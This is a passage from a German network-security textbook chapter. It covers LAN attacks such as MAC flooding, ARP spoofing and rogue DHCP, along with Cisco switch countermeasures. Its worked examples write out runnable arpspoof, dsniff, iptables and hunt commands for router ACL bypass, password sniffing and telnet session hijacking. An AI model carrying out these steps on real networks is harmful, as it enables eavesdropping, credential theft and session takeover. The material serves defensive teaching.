1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen

Größe: px
Ab Seite anzeigen:

Download "1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen"

Transkript

1 1 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen 1.1 Überblick über die Schwachstellen Bei der Beurteilung der Schwachstellen von lokalen Netzwerken sollte man zuerst die Unterschiede zwischen Shared und Switched Ethernet kennen, da Shared-Ethernet- Umgebungen wesentlich»anfälliger«für Angriffe sind als geswitchte LANs Shared und Switched Ethernet Shared Ethernet Das ursprüngliche Ethernet-Protokoll basiert auf einer Bus-Topologie, bei der alle Maschinen des lokalen Netzwerks im Prinzip an einem gemeinsam genutzten Bus angeschlossen sind und dadurch den gesamten Datenverkehr sehen können. In diesem Fall werden die einzelnen physikalischen Kabel über so genannte Hubs verbunden, die jedes empfangene Paket an alle verfügbaren Ports weiterleiten. Normalerweise ignorieren die Ethernet-Controller Pakete, die nicht für sie bestimmt sind. Es ist jedoch möglich, die Schnittstelle in den so genannten»promiscuous mode«zu setzen, bei dem der Controller alle Pakete aufnimmt. Dadurch kann ein Angreifer den gesamten Datenverkehr innerhalb des lokalen Ethernet mit den entsprechenden Programmen aufzeichnen, ohne weitere Vorkehrungen treffen zu müssen. Aus diesem Grund gibt es in einer Shared-Ethernet-Umgebung eigentlich keinen wirksamen Schutz gegen LAN-basierende Attacken. Ethernet-Schnittstelle filtert Pakete, die nicht für sie bestimmt sind. Ethernet-Schnittstelle filtert Pakete, die nicht für sie bestimmt sind. Zielsystem F8-31-A4-2D Befindet sich die Schnittstelle im Promiscuous Mode, werden alle Pakete vom Controller weitergegeben. Paket zum Zielsystem B Angreifer Sender Switched Ethernet In heutigen Ethernet-Umgebungen werden jedoch hauptsächlich Switches eingesetzt, die Pakete nur an die Ports weiterleiten, an denen die MAC-Adresse des Zielsystems

2 2 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen eingetragen ist. Dazu unterhält der Switch eine MAC-Adresstabelle (bei den Catalyst Switches auch als CAM-Tabelle (Content Addressable Memory) bezeichnet), in der er Informationen über die physikalischen Adressen, die über einen Switch-Port zu erreichen sind, mit den zugehörigen VLAN-Parametern abspeichert. Diese Adresstabelle kann auf den verschiedenen Switchtypen eine unterschiedliche Größe haben (z. B. über Einträge auf einem Catalyst 6000 oder nur 2000 auf einem Catalyst 2950XL). Sobald die Tabelle aufgefüllt ist, kann der Switch keine neuen MAC- Adressen mehr eintragen und muss Pakete, die für unbekannte Ethernet-Adressen bestimmt sind, über alle Ports weiterleiten. Diese Pakete werden dadurch innerhalb des kompletten Layer-2-Netzwerks geflutet (so genanntes Unicast Flooding) und sind daher auch für einen potenziellen Angreifer sichtbar. MAC-Adresse des Zielsystems ist nicht in der Tabelle des Switch eingetragen Falls der Switch die Zieladresse nicht kennt, flutet er das Paket über alle aktiven Ports (Flooding) und verhält sich dadurch wie ein Hub. Ein potenzieller Angreifer ist dann problemlos in der Lage, das Paket zu sehen. Port 2/17 Zielsystem F8-31-A4-2D Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Das heißt, der Switch flutet das Paket über alle Ports. Port Fa0/24 Zieladresse ist nicht in der MAC- Adresstabelle eingetragen. Das heißt, der Switch flutet das Paket über alle Ports. Paket zum Zielsystem F8-31-A4-2D Sender B Aufbau der MAC-Adresstabelle Falls der Switch ein Paket empfängt, dessen Quelladresse er noch nicht kennt, legt er für den Port und die Adresse einen neuen Eintrag in der MAC-Adresstabelle an. Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. Switch trägt die neue MAC-Adresse mit dem zugehörigen Port in seine Tabelle ein. Port 2/17 Sender F8-31-A4-2D Port Fa0/24 Zielsystem B

3 1.2 Überblick über die verschiedenen LAN-Attacken 3 cat5000> (enable) show cam 00:00:F8:31:a4:2d VLAN Dest MAC/Route Des Destination Ports or VCs / [Protocol Type] f8-31-a4-2d 2/17 [ALL] Total Matching CAM Entries Displayed = 1 cat2924c-xl# show mac-address-table address 0000.F831.A42D Non-static Address Table: Destination Address Address Type VLAN Destination Port f831.a42d Dynamic 1 FastEthernet0/24 MAC-Adresse des Zielsystems ist in der Tabelle des Switch eingetragen Ist die Zieladresse in der MAC-Adresstabelle enthalten, leitet der Switch das Paket nur noch an den eingetragenen Port weiter. In diesem Fall kann das Paket von einem potenziellen Angreifer nicht mehr gesehen werden. Switch filtert Paket. Switch filtert Paket. Port 2/17 Zielsystem F8-31-A4-2D Port Fa0/24 Paket zum Zielsystem F8-31-A4-2D Sender B Daher versucht bei LAN-basierenden Attacken der Angreifer zuerst, die Switches des lokalen Netzwerks so zu manipulieren, dass sie Pakete, die eigentlich nicht für ihn bestimmt sind, doch zu seinem Port weiterleiten. 1.2 Überblick über die verschiedenen LAN-Attacken Passive Monitoring (Ethernet Sniffing, Eavesdropping) Passive Monitoring (Ethernet Sniffing, Eavesdropping) nennt man Attacken, bei denen ein Angreifer versucht, den Datenverkehr auf dem lokalen Netzwerk abzuhören, um daraus interessante Informationen wie Benutzernamen, Passwörter oder SNMP-Community-Strings herauszufiltern. Bekannte Programme in diesem Bereich sind z. B. dsniff 1, Ettercap 2 oder Cain & Abel 3. Passive Monitoring wird häufig eingesetzt, um darauf aufbauend weitere Angriffe durchzuführen (z. B. DNS Spoofing). 1. dsniff: 2. ettercap: 3. cain & abel:

4 4 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Damit der Angreifer den Datenverkehr auch in einem geswitchten Netzwerk sehen kann, existieren verschiedene Verfahren, die in den nächsten Kapiteln näher erläutert werden. MAC Flooding (Kapitel 2.1) Der Angreifer füllt die MAC-Adresstabelle des Switch auf, damit Pakete über alle Ports geflutet werden müssen. MAC Spoofing (Kapitel 2.2) Der Angreifer verwendet die MAC-Adresse des Systems, das er angreifen möchte. ARP Spoofing (auch als ARP Cache Poisoning bezeichnet) (Kapitel 4.2) Der Angreifer sendet falsche ARP-Pakete, um den ARP Cache auf den angegriffenen Systemen zu modifizieren. VLAN-Attacken (Kapitel 7) Der Angreifer baut eine Trunk-Verbindung zum Switch auf. Spanning-Tree-Attacken (Kapitel 9) Unter bestimmten Umständen kann der Angreifer die Spanning-Tree-Topologie ändern. ICMP Redirect (Kapitel 10.1) Der Angreifer leitet durch ICMP Redirects den Datenverkehr zu seinem Rechner um. ICMP Router Advertisements (Kapitel 10.2) Der Angreifer ändert durch ICMP Router Advertisements das Default Gateway auf den Hosts. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Der Angreifer übernimmt die Rolle des Active Router und leitet dadurch die Daten zu seinem Rechner um. Rogue DHCP-Server (Kapitel ) Der Angreifer betreibt einen eigenen DHCP-Server und»versorgt«die DHCP- Clients mit falschen Informationen für das Default Gateway und den DNS- Server. Für Passive Monitoring ist es notwendig, dass sich die Ethernet-Schnittstelle des angreifenden Rechners im Promiscuous Mode befindet. Da die so genannten Sniffer- Programme oft auf einem normalen Computer laufen (z. B. unter Windows oder

5 1.2 Überblick über die verschiedenen LAN-Attacken 5 Linux), gibt es verschiedene Methoden zu überprüfen, ob auf einem Interface der Promiscuous Mode eingeschaltet ist oder nicht. Diese Verfahren funktionieren jedoch nicht, wenn man dedizierte Sniffer-Hardware einsetzt. Ping-Methode In diesem Fall wird ein ICMP Echo Request mit einer nicht vorhandenen MAC- Adresse zu der verdächtigen IP-Adresse gesendet. Falls sich das Interface im Promiscuous Mode befindet, wird der Rechner das Paket annehmen und einen ICMP Echo Reply zurückschicken. Dieses Verfahren kann im Prinzip auf alle anderen Protokolle erweitert werden, die eine Antwort auf ein bestimmtes Paket zurücksenden (z. B. TCP SYN/ACK auf ein TCP SYN oder ein ICMP Error auf ein ungültiges Paket). ARP-Methode Bei diesem Verfahren wird ein ARP Request zu einer nicht existierenden MAC- Adresse gesendet. Falls das System mit einem ARP Reply antwortet, befindet sich der Controller im Promiscuous Mode. DNS-Methode Da viele Sniffer-Programme ein automatisches DNS-Lookup von IP-Adressen durchführen, kann man den DNS-Verkehr des verdächtigen Rechners auf entsprechende Pakete überwachen. Diese Methoden sind jedoch allgemein bekannt und es gibt wiederum verschiedene Möglichkeiten, wie ein Angreifer das Versenden dieser verdächtigen Pakete unterbinden kann (z. B. über das Definieren von Filtern). DoS-Attacken Bei Denial-of-Service-Attacken versucht der Angreifer im Prinzip das lokale Netzwerk oder Teile davon so zu manipulieren, dass kein Datentransfer mehr möglich ist. Folgende LAN-basierende Angriffe können für DoS-Attacken eingesetzt werden: ARP Spoofing (Kapitel 4.2) Der ARP Cache wird mit nicht vorhandenen MAC-Adressen abgeändert. MAC Flooding/MAC Storm (Kapitel 2.1) Der Angreifer»flutet«sehr viele unterschiedliche MAC-Adressen bzw. Pakete über einen Port. MAC Spoofing (Kapitel 2.2) Der Angreifer verwendet eine doppelte MAC-Adresse.

6 6 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen VTP-Attacken (Kapitel 7.3) Der Angreifer modifiziert die aktiven VLANs mit Hilfe des Cisco-VTP-Protokolls (VLAN Trunking Protocol). STP-Attacken (Kapitel 9.2) Änderungen in der Topologie führen zu einer permanenten Neuberechnung des Spanning Tree. ICMP Redirects (Kapitel 10.1) Das Gateway für bestimmte Hosts wird auf eine nicht existierende Adresse abgeändert. ICMP Router Discovery (Kapitel 10.2) Das Default Gateway wird auf eine nicht existierende Adresse abgeändert. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Das Default Gateway wird auf eine nicht existierende Adresse abgeändert. Rogue DHCP-Server (Kapitel ) Es wird ein eigener DHCP-Server verwendet, der falsche Informationen vergibt (IP-Adresse des Clients, Default Gateway und/oder DNS- bzw. WINS-Server). DHCP Starvation (Kapitel ) Es werden alle verfügbaren IP-Adressen vom DHCP-Server angefordert. MitM-Attacken Bei Man-in-the-Middle-Attacken»klinkt«sich der Angreifer als»dritte Person«in eine Verbindung ein und fängt die übertragenen Daten ab, um sie dann ggf. zu modifizieren und anschließend an den Empfänger weiterzuleiten. MitM-Attacken bieten zudem die Möglichkeit, verschlüsselte Verbindungen (wie SSH oder SSL) zu dechiffrieren. A B AX

7 1.3 Überblick über die verschiedenen Schutzmaßnahmen 7 Die folgenden LAN-basierenden Angriffe ermöglichen MitM-Attacken: ARP Spoofing (Kapitel 4.2) ARP Cache für bestimmte IP-Adressen auf die MAC-Adressen des Angreifers abändern. Spanning-Tree-Attacken (Kapitel 9.3) Der Angreifer»klinkt«sich als Root Bridge in die Spanning-Tree-Topologie ein (Voraussetzung ist aber die Verbindung zu mindestens zwei Switches). ICMP Redirects (Kapitel 10.1) Das Gateway für bestimmte Hosts wird auf die IP-Adresse des Angreifers abgeändert. ICMP Router Discovery (Kapitel 10.2) Das Default Gateway wird auf die IP-Adresse des Angreifers abgeändert. HSRP- oder VRRP-Angriffe (Kapitel 11 und 12) Das Default Gateway wird auf die IP-Adresse des Angreifers abgeändert. Rogue DHCP-Server (Kapitel ) Der gefälschte DHCP-Server übergibt den Clients als Default Gateway die Adresse des Angreifers. 1.3 Überblick über die verschiedenen Schutzmaßnahmen Die Schwachstellen innerhalb eines Netzwerks, Computersystems oder Programms, die für einen potenziellen Angriff ausgenutzt werden können, bezeichnet man oft als Vulnerabilities, die Verfahren und Mechanismen, wie man sich gegen diese Angriffe schützen bzw. sie»abschwächen«kann, als Mitigation. MAC-Angriffe MAC Spoofing Mitigation Catalyst Port Security (siehe Kapitel 3) Statischer Eintrag für kritische Systeme in der MAC-Adresstabelle MAC Flooding Mitigation Catalyst Port Security (siehe Kapitel 3) Unicast-Flooding unterbinden (siehe Kapitel 3.3)

8 8 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Spanning-Tree und VLAN-Angriffe Root und BPDU Guard (siehe Kapitel 9.4) DTP auf allen Ports ausschalten, die nicht mit anderen Switches verbunden sind VTP ausschalten (siehe Kapitel 7.3.3) ARP Spoofing Mitigation Allgemeine Verfahren Intrusion-Detection-Systeme (IDS), die hohe Rate von ARP-Paketen erkennen Catalyst Port Security (falls der Angreifer fiktive MAC-Adressen benutzt) Statische ARP-Einträge für Router/Firewall (auf den Hosts, siehe Kapitel 4.2) und kritische Server (auf Router/Firewall) Layer-3-Trennung (siehe Kapitel 6.2.5) Unterbinden der Host-zu-Host-Kommunikation Private VLANs (siehe Kapitel 5) VLAN ACLs gegen Intra-Subnetz-Routing (siehe Kapitel 6.1.1) Router-zu-Host-Kommunikation Überprüfung der ARP-Pakete durch ARP Inspection (siehe Kapitel 6.2.4) Sticky ARP (Catalyst 6500 Switch mit MSFC-Routerkarte; siehe Kapitel 6.2.2) DHCP Secured IP Address Assignment (IOS; siehe Kapitel 6.2.3) IP-basierende Angriffe IP Spoofing Mitigation Anti-IP-Spoofing Filter (siehe Kapitel 14.1) Unicast Reverse Path Forwarding (siehe Kapitel 14.3) IP Source Guard (siehe Kapitel ) ICMP-basierende Angriffe ICMP-Redirect-Pakete auf den Hosts ignorieren ICMP-Router-Discovery-Protokoll auf den Hosts nicht einschalten ICMP-Router-Advertisement und Redirect-Pakete auf den Switches filtern DHCP-basierende Angriffe Catalyst Port Security (siehe Kapitel 3) DHCP Snooping (siehe Kapitel ) VLAN ACL Redirects und per-port ACLs (siehe Kapitel )

9 1.4 Beispiele für verschiedene LAN-Angriffe 9 HSRP- und VRRP-basierende Angriffe IGMP-Filter auf den Switches (siehe Kapitel ) MD5-Authentifizierung der HSRP-Pakete (siehe Kapitel ) Konfigurationsrichtlinien für VRRP beachten (siehe Kapitel 12.4) 1.4 Beispiele für verschiedene LAN-Angriffe Das folgende Kapitel beschreibt exemplarisch einige Angriffe, die zeigen, wie einfach man Passwörter aus dem Datenstrom herausfiltern kann oder wie man verschlüsselte SSH- oder SSL-Verbindungen»knacken«kann, ohne jetzt schon näher auf die einzelnen Techniken einzugehen Zugriffsliste eines Routers umgehen In diesem Beispiel wird mit Hilfe der Programme IRS und sterm 4 die Zugriffsliste eines Routers umgangen, über die der Telnet/SSH-Zugriff auf bestimmte IP-Adressen beschränkt wird. Konfiguration des Routers Default Gateway IP: Angreifer IP: MAC: lokal (00-D ) MAC: gespooft ( ) Management-Stationen IP: IP: hostname c1720! interface FastEthernet0 description -- Inside Interface zum lokalen Netzwerk -- ip address ! access-list 101 permit tcp host any eq telnet log-input access-list 101 permit tcp host any eq 22 log-input Die Zugriffsliste gibt Telnet und SSH nur für die IP-Adressen und frei. 4. IRS und sterm:

10 10 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen access-list 101 permit tcp host any eq telnet log-input access-list 101 permit tcp host any eq 22 log-input! line vty 0 4 access-class 101 in password c login c1720# show arp Protocol Address Age (min) Hardware Addr Type Interface Internet f808.3daf ARPA FastEthernet0 Internet c17d.d654 ARPA FastEthernet0 Internet f831.a42d ARPA FastEthernet0 Testen der Router ACL mit IRS Mit Hilfe des Programms IRS kann man zunächst ermitteln, welche Hosts überhaupt auf den Router zugreifen dürfen. IRS arbeitet dabei folgendermaßen: 1. Es sendet ARP Replies mit der lokalen Ethernet-Adresse und der gespooften IP- Adresse zum Router. 2. Zun Aufbau einer Telnet-Verbindung schickt IRS TCP/SYN-Paket für Port 23 zum Router. 3. Falls der Router mit einem SYN/ACK antwortet, ist diese Adresse durch die Zugriffsliste freigegeben. Der folgende Trace 5 zeigt das Verhalten, wenn die»gespoofte«ip-adresse durch die Router ACL gesperrt ist. IRS überprüft in diesem Auszug die IP-Adresse Falls die getestete IP-Adresse auf dem Router freigegeben ist, wird

11 1.4 Beispiele für verschiedene LAN-Angriffe 11 auf das TCP/SYN-Paket des Angreifers statt eines RST/ACK ein SYN/ACK zurückgesendet. ARP Spoofing, um ARP Cache auf dem Router zu verändern (Punkt 1) Um einen evtl. bestehenden Eintrag im ARP Cache des Routers zu verändern, sendet IRS für die zu überprüfende IP-Adresse zuerst ein gefälschtes ARP-Reply- Paket mit seiner lokalen MAC-Adresse. Ethernet II, Src: 00:d0:59:05:95:09, Dst: 00:04:c1:7d:d6:54 Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002) Sender MAC address: 00:d0:59:05:95:09 (00:d0:59:05:95:09) Sender IP address: ( ) Target MAC address: 00:00:00:00:00:00 (00:00:00:00:00:00) Target IP address: ( ) Aufbau der TELNET-Verbindung zum Router (Punkt 2) Ethernet II, Src: 00:d0:59:05:95:09, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: , Dst Addr: Transmission Control Protocol, Src Port: 386 (386), Dst Port: telnet (23) Source port: 386 (386) Destination port: telnet (23) Sequence number: 9961 IRS sendet TCP/SYN-Paket zum Header length: 20 bytes Port 23 des Routers. Flags: 0x0002 (SYN) Window size: 4096 Checksum: 0xc095 (correct) Antwort des Routers (Punkt 3) Falls der Zugriff über eine ACL geschützt ist, sendet der Router ein RST-Paket an den Angreifer zurück. Dadurch weiß IRS, dass Telnet-Verbindungen von dieser IP-Adresse gesperrt sind. Ethernet II, Src: 00:04:c1:7d:d6:54, Dst: 00:d0:59:05:95:09 Internet Protocol, Src Addr: , Dst Addr: Transmission Control Protocol, Src Port: telnet (23), Dst Port: 386 (386 Source port: telnet (23) Destination port: 386 (386) Sequence number: 0 Acknowledgement number: 9962 Header length: 20 bytes Flags: 0x0014 (RST, ACK) Window size: 0 Checksum: 0xd082 (correct) Falls die IP-Adresse freigegeben wäre, würde der Router statt des RST/ACK ein SYN/ACK-Paket zurücksenden. 5. Sofern nicht anders vermerkt, sind alle Traces in diesem Buch auf einem Linux-System mit dem Programm tethereal erzeugt worden (http://www.ethereal.com).

12 12 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Router ACL mit sterm umgehen Anschließend wird sterm benutzt, um eine Telnet-Verbindung mit einer»gespooften«ip-adresse zum Router aufzubauen. Vor dem Verbindungsaufbau sendet das Programm zunächst gefälschte ARP Replies mit der lokalen bzw. einer gespooften MAC-Adresse sowie der»gespooften«ip-adresse zum Router. Dadurch wird der ARP Cache des Routers mit der vom Angreifer verwendeten MAC-Adresse überschrieben. Der folgende Trace zeigt die gefälschten ARP- und IP-Pakete, mit denen sterm die Router ACL umgeht. Als IP-Quelladresse benutzt der Angreifer die IP-Adresse ARP Cache auf dem Router modifzieren Damit der Router die von sterm verwendete MAC-Adresse im ARP Cache behält, sendet das Programm in regelmäßigen Abständen ARP Replies für die gespoofte IP- und MAC-Adresse. Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002)

13 1.4 Beispiele für verschiedene LAN-Angriffe 13 Sender MAC address: 00:11:22:33:44:55 (00:11:22:33:44:55) Sender IP address: ( ) Target MAC address: 00:00:00:00:00:00 (00:00:00:00:00:00) Target IP address: ( ) c1720# show arp incl 189 Der Eintrag im ARP Cache ist in diesem Beispiel mit einer gespooften MAC-Adresse überschrieben worden. Internet ARPA FastEthernet0 Aufbau der TELNET-Verbindung Anschließend kann sterm eine Telnet-Verbindung zum Router aufbauen. Dabei benutzt es die gespoofte IP- und Ethernet-Adresse. TCP/SYN-Paket des Angreifers Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: , Dst Addr: Transmission Control Protocol, Src Port: 13167, Dst Port: telnet (23 Source port: (13167) Destination port: telnet (23) Sequence number: 41 Header length: 20 bytes Flags: 0x0002 (SYN) Window size: 4096 Checksum: 0xb545 (correct) SYN/ACK-Paket des Routers Ethernet II, Src: 00:04:c1:7d:d6:54, Dst: 00:11:22:33:44:55 Internet Protocol, Src Addr: , Dst Addr: Transmission Control Protocol, Src Port: telnet (23), Dst Port: Source port: telnet (23) Destination port: (13167) Sequence number: Acknowledgement number: 42 Header length: 24 bytes Flags: 0x0012 (SYN, ACK) Window size: 4128 Checksum: 0x4fcc (correct) Options: (4 bytes) ACK-Paket des Angreifers Ethernet II, Src: 00:11:22:33:44:55, Dst: 00:04:c1:7d:d6:54 Internet Protocol, Src Addr: , Dst Addr: Transmission Control Protocol, Src Port: 13167, Dst Port: telnet (23) Source port: (13167) Destination port: telnet (23) Sequence number: 42 Acknowledgement number: Header length: 20 bytes Flags: 0x0010 (ACK) Window size: 4096 Checksum: 0x67a9 (correct)

14 14 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Solange der Angreifer keine separate MAC-Adresse verwendet, kann dieser Angriff nicht durch die Catalyst Port Security unterbunden werden, und auch private VLANs bieten wenig Schutz, da der Router in der Regel an einem Promiscuous Port angeschlossen ist und alle Hosts eines Isolated VLAN mit diesem Port kommunizieren können. Von daher müssen in diesem Fall andere Schutzmechanismen eingesetzt werden, um den Angriff abzuwenden: Manuelle Definition von statischen ARP-Einträgen In diesem Fall muss für jeden Host, der auf den Router zugreifen soll, ein statischer ARP-Eintrag definiert werden. Da dies jedoch mit einem hohen Management-Aufwand verbunden ist und schlecht skaliert, sollte man besser andere Verfahren verwenden. Automatische Definition von statischen ARP-Einträgen Sofern es sich bei dem Router um die MSFC-Karte eines Catalyst 6000 handelt, kann man den Sticky-ARP-Mechanismus verwenden, um automatisch die statischen ARP-Einträge zu generieren (siehe Kapitel 6.2.2). Port-basierende ACLs (im Moment nur Catalyst 4500 mit Native IOS) Um die gespooften IP-Adressen direkt an den»nicht-management«-ports zu filtern, kann man eine Port-basierende Zugriffskontrollliste auf dem Switch definieren, die Pakete mit den Management-Adressen verwirft. ip access-list extended BlockSpoofedAddresses deny ip host any deny ip host any permit ip any any! interface name ip access-group BlockSpoofedAddresses in Überprüfung der gefälschten ARP-Pakete durch ARP Inspection Ein weiterer Schutzmechanismus gegen ARP Spoofing ist die dynamische Inspektion der ARP-Pakete durch den Switch (ARP Inspection oder ARP Snooping, siehe Kapitel 6.2.4) Password Sniffing mit DSNIFF In diesem Beispiel leitet der Angreifer über ARP Spoofing den kompletten Datenverkehr, den der Host zum Default Gateway ( ) senden will, zuerst zu seinem Rechner ( ) um. Damit nicht alle Hosts des lokalen Netzwerkes ihren ARP Cache verfälschen, verwendet der Angreifer keinen Gratuitous ARP, sondern einen direkten ARP Reply zu der MAC-Adresse des anzugreifenden Rechners.

15 1.4 Beispiele für verschiedene LAN-Angriffe 15 attack: # arpspoof -t Defaul t Gateway IP: / 21 MAC: C-07-AC-7B Angegriffener Rechner IP: / 21 MAC: 00-D Ohne ein zweites ARP Spoofing sendet der Router die Pakete direkt zum Zielsystem. Angreifer (Host attack) IP: / 21 MAC: D-D6 Alle gesendeten Pakete gehen über den Angreifer. ARP Reply (IP: MAC: D-D6) Ethernet II, Destination: 00:d0:59:05:95:09 Source: 00:60:97:80:9d:d6 Type: ARP (0x0806) Address Resolution Protocol (reply) Hardware type: Ethernet (0x0001) Protocol type: IP (0x0800) Hardware size: 6 Protocol size: 4 Opcode: reply (0x0002) Sender MAC address: 00:60:97:80:9d:d6 Sender IP address: Target MAC address: 00:d0:59:05:95:09 Target IP address: Der Angreifer trägt hier seine MAC-Adresse ein. Durch die permanent gesendeten ARP Replies modifiziert der Zielrechner seinen ARP-Eintrag und trägt als MAC-Adresse für das Default Gateway die MAC-Adresse des Angreifers ein. C:\> arp -a Interface: on Interface 2 Internet Address Physical Address d-d6 Durch die permanent gesendeten ARP Replies ist im ARP Cache immer die MAC-Adresse des Angreifers eingetragen. Der Angreifer ist anschließend in der Lage, den kompletten Datentransfer zwischen dem Host und dem Default Gateway mitzuprotokollieren und z. B. über das Programm DSNIFF 6 die Benutzernamen und Passwörter aus dem Datenstrom herauszufiltern. Soll auch der Verkehr zwischen Gateway und Host überwacht werden, muss der Angreifer noch ein ARP Reply zum Gateway senden (arpspoof -t ). attack# dsniff -cn dsniff: listening on eth /28/02 13:16:15 tcp > (telnet) andreas c ena c In diesem Beispiel wurde die Telnet-Verbindung auf einen Router protokolliert und das Login- sowie das Enable-Passwort sind zu sehen. 6. dsniff:

16 16 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen Um die umgeleiteten Pakete an das Default Gateway weiterleiten zu können, muss der Angreifer auf dem Linux-System IP Forwarding ein- und das Versenden von ICMP Redirects ausschalten. attack# echo "1" > /proc/sys/net/ipv4/ip_forward attack# iptables 7 -t filter -A OUTPUT -p icmp -s 0/0 -d 0/0 -j DROP --icmp-type redirect attack# iptables -vl Chain INPUT (policy ACCEPT 5638 packets, 619K bytes) pkts bytes target prot opt in out source destination Chain FORWARD (policy ACCEPT 19 packets, 1140 bytes) pkts bytes target prot opt in out source destination Chain OUTPUT (policy ACCEPT 1674 packets, 192K bytes) pkts bytes target prot opt in out source destination DROP icmp -- any any anywhere anywhere icmp redirect Ohne das Ausschalten der ICMP Redirects würde das Linux-System eine Redirect- Nachricht an den Host senden und als Gateway für die angesprochene Zieladresse den normalen Router eintragen. Neben dem Filtern der Nachrichten durch einen iptables-eintrag kann man das Versenden von ICMP Redirects auf einem Linux- Rechner auch über den folgenden Befehl komplett für eine Schnittstelle ausschalten: attack# echo "0" > /proc/sys/net/ipv4/conf/eth0/send_redirects Als Schutzmaßnahmen gegen Password Sniffing bieten sich private VLANs an, da sie das Versenden der gefälschten ARP-Pakete in Richtung der anderen Hosts unterbinden und der Angreifer dadurch den Datentransfer der anderen Rechner nicht zu seinem System umleiten kann Session Hijacking mit Hunt Bei diesem Beispiel verwendet ein Angreifer das Programm hunt 8, um mit ARP Spoofing eine bestehende TELNET-Verbindung zwischen einem OpenVMS-System und einem IOS-Router zu übernehmen. 7. Weitere Informationen über die Linux-Filter: 8. hunt:

17 1.4 Beispiele für verschiedene LAN-Angriffe 17 OpenVMS System IOS-Router Telnet Session zum Router wird vom Angreifer übernommen ARP Reply (IP: MAC: EA:1A:DE:AD:BE:01) ARP Reply (IP: MAC: EA:1A:DE:AD:BE:02) Angreifer ARP Spoofing Um den Angriff durchführen zu können, muss der Angreifer zuerst den ARP Cache auf dem Router und dem Host durch ARP Spoofing modifizieren. Damit die Änderungen nicht wieder durch die richtigen Adressen überschrieben werden, sendet hunt permanent entsprechende ARP Replies. ARP Relay Daemon starten attack# hunt /* * hunt 1.5 * multipurpose connection intruder / sniffer for Linux * (c) by kra */ starting hunt --- Main Menu --- rcvpkt 2, free/alloc 63/ l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit *> d --- daemons --- rcvpkt 97, free/alloc 63/ r) reset daemon a) arp spoof + arp relayer daemon s) sniff daemon m) mac discovery daemon x) return *dm> a

18 18 1 Schwachstellen, Angriffe und Schutzmaßnahmen in lokalen Netzen --- arpspoof daemon --- rcvpkt 138, free/alloc 63/ s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> s ARP Spoofing für Verbindungen zwischen den beiden Hosts einschalten daemon started --- arpspoof daemon --- rcvpkt 181, free/alloc 63/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> a src/dst host1 to arp spoof> host1 fake mac [EA:1A:DE:AD:BE:01]> src/dst host2 to arp spoof> host2 fake mac [EA:1A:DE:AD:BE:02]> refresh interval sec [0]> ARP Spoofing testen hunt verwendet in diesem Beispiel nicht vorhandene MAC-Adressen für das ARP Spoofing. --- arpspoof daemon --- rcvpkt 785, free/alloc 61/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> t 0) on is as EA:1A:DE:AD:BE:01 refresh 0s 1) on is as EA:1A:DE:AD:BE:02 refresh 0s item nr. to test> 0 ARP spoof in host OK --- arpspoof daemon --- rcvpkt 875, free/alloc 62/64 ---Y--- s/k) start/stop relayer daemon l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return *arps> t 0) on is as EA:1A:DE:AD:BE:01 refresh 0s 1) on is as EA:1A:DE:AD:BE:02 refresh 0s item nr. to test> 1 ARP spoof in host OK --- arpspoof daemon --- rcvpkt 949, free/alloc 62/64 ---Y--- s/k) start/stop relayer daemon

19 1.4 Beispiele für verschiedene LAN-Angriffe 19 l/l) list arp spoof database a) add host to host arp spoof i/i) insert single/range arp spoof d) delete host to host arp spoof r/r) remove single/range arp spoof t/t) test if arp spoof successed y) relay database x) return ARP Cache auf dem Host und dem Router Durch die von hunt permanent gesendeten gefälschten ARP Replies wird auf den betroffenen Systemen im ARP Cache die»gespoofte«mac-adresse eingetragen. TCPIP> show arp Cnt Flags Timer Host Phys Addr 1: UCS ea-1a-de-ad-be-02 router# show arp Protocol Address Age (min) Hardware Addr Type Interface Internet ea1a.dead.be01 ARPA Ethernet0 Session Hijacking Nachdem der ARP Spoof Daemon gestartet ist, gehen alle Pakete, die zwischen den Rechnern und ausgetauscht werden, zuerst zum Angreifer. Telnet Session protokollieren --- Main Menu --- rcvpkt 1148, free/alloc 63/64 ---Y--- l/w/r) list/watch/reset connections u) host up tests a) arp/simple hijack (avoids ack storm if arp used) s) simple hijack d) daemons rst/arp/sniff/mac o) options x) exit *> l 1) [1253] --> [23] 2) [49230] --> [23] --- Main Menu --- rcvpkt 